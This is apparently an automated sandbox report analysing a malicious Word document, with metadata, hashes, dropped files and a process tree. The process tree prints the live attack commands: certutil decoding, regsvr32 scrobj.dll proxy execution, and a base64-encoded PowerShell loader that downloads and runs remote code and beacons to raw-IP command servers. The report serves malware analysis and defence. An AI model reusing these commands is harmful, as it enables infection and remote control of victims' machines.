File name: | 487982bc6f4a82556f0ab3c219f55ae0.doc |
Full analysis: | https://app.any.run/tasks/94c5e646-cc74-4b45-9230-e658993a2ec5 |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 06:44:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 7 17:46:00 2019, Last Saved Time/Date: Mon Jan 7 17:46:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 61, Security: 0 |
MD5: | 487982BC6F4A82556F0AB3C219F55AE0 |
SHA1: | 0F90CC00C86536E51B8BDF6BD97F9302682B6718 |
SHA256: | 471545026007C352F60C75355221CD13784ED3499DBD9EEB221FE7824ADE0842 |
SSDEEP: | 3072:SkMw3UGSBdXjjQsppr2HzxznvyXvcWNl:SekGSBdBpprgzxznqXvc |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Document Microsoft Word 97-2003 |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 71 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 61 |
Words: | 11 |
Pages: | 1 |
ModifyDate: | 2019:01:07 17:46:00 |
CreateDate: | 2019:01:07 17:46:00 |
TotalEditTime: | 1.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3216 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\487982bc6f4a82556f0ab3c219f55ae0.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3940 | C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.bat | C:\Users\admin\AppData\Local\msutil.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2680 | REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3473 | C:\Windows\system32\reg.exe | — | msutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3044 | C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Notepad" /V admin | C:\Windows\system32\cmd.exe | — | msutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3280 | reg query "HKCU\Software\Microsoft\Notepad" /V admin | C:\Windows\system32\reg.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3696 | certutil -decode temp.txt C:\Users\admin\AppData\Roaming\3473.txt | C:\Windows\system32\certutil.exe | — | msutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2544 | regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\3473.txt scrobj.dll | C:\Windows\system32\regsvr32.exe | msutil.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3980 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JHtFYFJSYG9SQWBDVGBJb05wckVmYEVyRW5DRX0gPSAoJ1NpbGVudCcrJ2x5Q29udGknKyduJysndWUnKTske1djfT1OZVctT2JKZWN0IFNZc1RFTS5OZXQuV2ViQ0xJZW5UOyR7dX09KCdNJysnb3ppbGxhLzUuJysnMCAoV2knKyduZG93cycrJyBOVCcrJyA2JysnLjE7IFdPVzY0OyBUcmlkZW50LzcuJysnMDsgcnY6MScrJzEuJysnMCcrJyknKycgbGlrZScrJyAnKydHZWNrbycpO1tTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHske1RgUnVlfX07JHt3Y30uSEVhZEVycy5BRGQoKCdVJysnc2VyLUFnZScrJ250JyksJHt1fSk7JHtXYGN9LlBSb3h5PVtTeVN0ZU0uTmV0LldFQlJlUXVlU1RdOjpERWZhdWx0V0ViUFJPWHk7JHt3Q30uUHJPWHkuQ3JFREVOVGlBbHMgPSBbU1lTVGVNLk5lVC5DckVkZU50SWFMQ0FjSEVdOjpEZUZhdWx0TkVUV09ya0NyRURlTnRJQUxTOyR7c2NySWBQVDpgcFJvYFh5fSA9ICR7V0N9LlByb3h5O2lmIChbRW52aXJvbm1lbnRdOjpPU1ZlcnNpb24uVmVyc2lvbiAtZ2UgKG5ldy1vYmplY3QgKCdWZXJzJysnaW8nKyduJykgMTAsMCkpIHsgSUVYICR7V2N9LmRvd25sb2Fkc3RyaW5nKCgnaHQnKyd0cDovLzE5JysnOC41MCcrJy4yMzkuNjMvYnlwZm81JysnZDQyJysnLnR4JysndCcpKSB9JHtrfT1bU1lTdEVNLlRFeFQuRU5Db2RpbkddOjpBU0NJSS5HZVRCeXRFcygoJzdhJysnODYxYzgnKydmJysnMTInKyc1ZTY5MycrJ2InKyc0ZTEnKycxOTIzNmY2Yzc3JysnYjgnKyc3JykpOyR7Un09eyR7ZH0sJHtrfT0ke2FSYEdTfTske1N9PTAuLjI1NTswLi4yNTV8JXske2p9PSgke2p9KyR7U31bJHtffV0rJHtLfVske199JSR7a30uQ09VbnRdKSUyNTY7JHtzfVske199XSwke3N9WyR7Sn1dPSR7U31bJHtqfV0sJHtTfVske199XX07JHtEfXwleyR7SX09KCR7aX0rMSklMjU2OyR7aH09KCR7aH0rJHtzfVske2l9XSklMjU2OyR7U31bJHtpfV0sJHtzfVske0h9XT0ke3N9WyR7aH1dLCR7U31bJHtpfV07JHtffS1CeG9yJHtTfVsoJHtTfVske2l9XSske1N9WyR7SH1dKSUyNTZdfX07JHtzYGVyfT0oJ2h0dHAnKydzOicrJy8vMTg1LicrJzEwLjY4LicrJzEnKyc4OTonKyc0NDMnKTske3R9PSgnLycrJ25ld3MnKycucGhwJyk7JHtXYEN9LkhlQWRlUnMuQUREKCgnQ29vaycrJ2llJyksKCdzZXMnKydzaW9uPVMnKydkJysnZGVlRScrJ1poJysneGEnKydYN0gnKydhc2lwcFFHeTInKyc1cWg0JysnVT0nKSk7d2hpbGUoLW5vdCAkZEF0QSl7JHtEYEFUQX09JHtXYEN9LkRvd05sb0FkRGF0QSgke1NgZVJ9KyR7dH0pO3N0YXJ0LXNsZWVwIDEwfTske0lgVn09JHtEYEF0QX1bMC4uM107JHtEYWBUQX09JHtkYEF0QX1bNC4uJHtkQWBUYX0ubGVOR3RIXTstSm9pTltDSEFSW11dKCYgJHtyfSAke2RgQXRhfSAoJHtpYFZ9KyR7a30pKXxJRVg=')) | IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | regsvr32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3836 | C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.bat | C:\Users\admin\AppData\Local\msutil.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2524 | REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3515 | C:\Windows\system32\reg.exe | — | msutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5748.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B85EM9QITLDTVOTZM4LZ.temp | — | |
MD5:— | SHA256:— | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1C13ED0.wmf | wmf | |
MD5:88EE6104A3DE09AFFB4EDA6249796C87 | SHA256:3C6F00A8949FBA764545B19E9A7E335BAFE0CF2C3619AD125CA481EC205D60F0 | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:E440D8E6EDF168962957C33A74919A65 | SHA256:8482313FCE545467D1159622521F5F0653AE8B4BDCDDC73FFA822CABCF51F85C | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E6C7D4B.wmf | wmf | |
MD5:1165E2A196D4AE5AA5659C0C00C9DCB2 | SHA256:BA41C3AC81E10FC1F4150F2A2682BE77C9BD2DE483A69F8E23218AE97AEEB2A4 | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B38E75.wmf | wmf | |
MD5:35EE699D786ADA7E670BB3F78F24D9F3 | SHA256:89CF93346A431441CD5BC25E2B6F70096A7F4CCA6FC2DC089AEC0F6FB87B86C1 | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$7982bc6f4a82556f0ab3c219f55ae0.doc | pgc | |
MD5:A96C79EF2A3F77AFD19A134A4598F37F | SHA256:A00CC2CFBF4A5B6BD9778E51A4E9AE756A3AA868F6EEB526CC7BE1C8CC5684FD | |||
3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B96EA31D058925C6BD3AF4072F256386 | SHA256:2D41139497F816989E2213BBB0CD44F9DEAE48773240A965A24100C5E930F4D5 | |||
3940 | msutil.exe | C:\Users\admin\AppData\Local\Temp\temp.txt | text | |
MD5:076458C13359B56EC7304751B5B4A353 | SHA256:BD95B2FFD28EC103021563EE68AA1E031F07CDD15C6D3475B3743E7F8CA0E188 | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3980 | powershell.exe | 185.10.68.189:443 | — | Flokinet Ltd | SC | suspicious |